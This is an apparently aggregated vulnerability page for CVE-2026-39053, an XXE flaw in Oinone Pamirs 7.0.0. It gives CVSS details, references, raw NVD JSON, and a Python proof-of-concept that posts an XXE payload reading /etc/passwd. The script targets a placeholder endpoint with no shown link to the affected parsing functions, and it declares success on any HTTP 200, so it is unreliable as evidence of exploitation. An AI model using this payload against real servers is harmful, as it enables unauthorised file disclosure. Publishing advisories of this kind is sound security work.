CVE-2026-39053

Description

Oinone Pamirs 7.0.0 contains an XML External Entity (XXE) issue in its XStream-based XML parsing logic. When attacker-controlled XML is passed to framework parsing entry points such as PamirsXmlUtils.fromXML(...) or ViewXmlUtils.fromXML(...), unsafe XML processing can lead to file disclosure or SSRF.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Oinone Pamirs 7.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://vulnerable-host:8080/api/process"

# XXE Payload to read file
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>"""

headers = {
    "Content-Type": "application/xml"
}

try:
    response = requests.post(target_url, data=xxe_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39053
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39053
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39053/
[4] VulDB https://vuldb.com/cve/CVE-2026-39053
[5] https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1
[6] https://github.com/oinone/oinone-pamirs
[7] https://www.oinone.top/changelog

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39053", "sourceIdentifier": "[email protected]", "published": "2026-05-15T15:16:51.613", "lastModified": "2026-05-15T21:16:35.503", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Oinone Pamirs 7.0.0 contains an XML External Entity (XXE) issue in its XStream-based XML parsing logic. When attacker-controlled XML is passed to framework parsing entry points such as PamirsXmlUtils.fromXML(...) or ViewXmlUtils.fromXML(...), unsafe XML processing can lead to file disclosure or SSRF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1", "source": "[email protected]"}, {"url": "https://github.com/oinone/oinone-pamirs", "source": "[email protected]"}, {"url": "https://www.oinone.top/changelog", "source": "[email protected]"}]}}